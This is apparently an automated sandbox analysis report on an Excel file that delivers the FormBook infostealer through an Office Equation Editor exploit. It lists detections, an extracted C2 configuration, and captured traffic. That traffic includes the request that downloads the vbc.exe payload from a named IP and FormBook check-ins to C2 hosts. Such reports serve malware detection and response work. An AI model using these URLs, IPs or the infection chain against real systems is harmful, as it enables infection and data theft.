Windows Analysis Report COAU7229898130.xlsx

Overview

General Information

Sample Name: COAU7229898130.xlsx
Analysis ID: 483666
MD5: 6440075843d5ae28dfccf6c9b09830c2
SHA1: fb5ea7b3defc0c15177429caaf45cdddd80cac7c
SHA256: 22c19360c2a9ee4aaa12439aa1c3ace0ecc3287e0b61481f21619e4bb69f5157
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Svchost Process
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.southerngiggle.com/imi7/"], "decoy": ["michaelhavemeyer.com", "surukuku.com", "happyhoneybaby.com", "carlsbadbeachwear.com", "mobiledepotrd.com", "cscclothing.com", "absolutalibertas.com", "gtof.net", "zahnspange-billstedt.com", "tuzlaekspertiz.net", "card05pay.site", "thebuilders24.com", "xs-of.com", "pempekgputra.com", "campverano.com", "tutorialscorner.net", "natconsultant.com", "dogloveya.com", "meatbasedlifestyle.com", "agamdesigners.com", "aashiyanafoundation.com", "confidentialbk.com", "snowbirdsrus.com", "lechouba.com", "popuality.com", "okulekitaplari.com", "blackwelldesignco.com", "abhayart.com", "ooftclub.com", "optima9.com", "neurohubapp.com", "plucknplace.com", "adbarista.com", "crownfoamus.com", "finalformlxp.com", "somethingnewstudio.com", "motorcyclejob.asia", "hasanmedicalservice.com", "thvsjwjvy.icu", "powerlinkme.com", "sceneinnyc.com", "onpointonlinemarketing.com", "abc-staff.com", "thinoft.com", "kamishichang.com", "aronexcorp.com", "garfld.com", "namasteezeindustries.com", "359326.com", "be530.com", "acceptedsolutions.net", "tuiseyingxiang.com", "thechikspot.com", "moneysavingkitchen.com", "valueplants.com", "casabedar.com", "biotechfla.com", "weekendclones.com", "tomrings.com", "nonamecreative.com", "streetracingscanner.com", "centerforcommonground.com", "download-apps.site", "sungoldhomeliving.com"]}
Multi AV Scanner detection for submitted file
Source: COAU7229898130.xlsx Virustotal: Detection: 35%
Source: COAU7229898130.xlsx ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://103.133.106.199/rbi/vbc.exe Avira URL Cloud: Label: malware
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
Source: Binary string: svchost.pdb source: vbc.exe, 00000007.00000002.514322943.0000000000549000.00000004.00000020.sdmp

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.359326.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.133.106.199:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.133.106.199:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 67MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 192.0.78.25:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.thvsjwjvy.icu
Source: C:\Windows\explorer.exe Domain query: www.carlsbadbeachwear.com
Source: C:\Windows\explorer.exe Domain query: www.biotechfla.com
Source: C:\Windows\explorer.exe Network Connect: 154.91.1.126 80
Source: C:\Windows\explorer.exe Network Connect: 47.91.170.222 80
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe Domain query: www.359326.com
Source: C:\Windows\explorer.exe Domain query: www.absolutalibertas.com
Source: C:\Windows\explorer.exe Domain query: www.crownfoamus.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.southerngiggle.com/imi7/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View ASN Name: AUTOMATTICUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /imi7/?8pGdYd7=JylIKvNk78hOFd+1TnqK+cq4SLeKYXMs9BOMQrcpY54MEXf7zcD8i4BM8h1sFc+7G7xGrw==&edrh=onDxIjzxvz HTTP/1.1 Host: www.thvsjwjvy.icu Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /imi7/?8pGdYd7=nnh6Wn4YtMnGcYcsMkPyBnKFlLVF5md1d8S2Q13SdHwJLrOdJeCsdNPQR8GZEfRmALPZ9A==&edrh=onDxIjzxvz HTTP/1.1 Host: www.biotechfla.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDxzdmmmhzDSPz7MbqA==&edrh=onDxIjzxvz HTTP/1.1 Host: www.absolutalibertas.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.133.106.199
Source: Joe Sandbox View IP Address: 192.0.78.25
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Wed, 15 Sep 2021 09:13:26 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9 Last-Modified: Wed, 15 Sep 2021 07:48:09 GMT ETag: "a7e00-5cc03eb5c1717" Accept-Ranges: bytes Content-Length: 687616 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: PE executable image (MZ header)
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /rbi/vbc.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 103.133.106.199 Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 15 Sep 2021 09:14:52 GMT Content-Type: text/html Content-Length: 320 Connection: close ETag: "595213ce-140" Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><frameset rows="100%"><frame src="https://wanwang.aliyun.com/domain/parking"><noframes><body><script> <a href="https://wanwang.aliyun.com/domain/parking">link</a></body></noframes></frameset>
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.488209976.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682320675.0000000004410000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.491485736.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.488209976.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682320675.0000000004410000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: EBBD63B0.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.502611514.0000000008428000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.502611514.0000000008428000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: svchost.exe, 00000009.00000002.682029665.0000000001062000.00000004.00020000.sdmp String found in binary or memory: https://www.absolutalibertas.com/imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXD
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBBD63B0.emf
Source: unknown DNS traffic detected: queries for: www.359326.com

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
.NET source code contains very large strings
Source: vbc[1].exe.4.dr, Form1.cs Long String: Length: 38272
Source: vbc.exe.4.dr, Form1.cs Long String: Length: 38272
Source: 6.2.vbc.exe.f70000.2.unpack, Form1.cs Long String: Length: 38272
Source: 6.0.vbc.exe.f70000.0.unpack, Form1.cs Long String: Length: 38272
Source: 7.0.vbc.exe.f70000.0.unpack, Form1.cs Long String: Length: 38272
Source: 7.2.vbc.exe.f70000.5.unpack, Form1.cs Long String: Length: 38272
Yara signature match
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457888 6_2_00457888
Source: C:\Users\Public\vbc.exe Code function: 6_2_004590A8 6_2_004590A8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00450168 6_2_00450168
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455178 6_2_00455178
Source: C:\Users\Public\vbc.exe Code function: 6_2_00457120 6_2_00457120
Source: C:\Users\Public\vbc.exe Code function: 6_2_00458291 6_2_00458291
Source: C:\Users\Public\vbc.exe Code function: 6_2_00454BA9 6_2_00454BA9
Source: C:\Users\Public\vbc.exe Code function: 6_2_00456550 6_2_00456550
Source: C:\Users\Public\vbc.exe Code function: 6_2_00455578 6_2_00455578
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B040 6_2_0045B040
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045B030 6_2_0045B030
Source: C:\Users\Public\vbc.exe Code function: 6_2_004578C8 6_2_004578C8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0045D8E8 6_2_0045D8E8
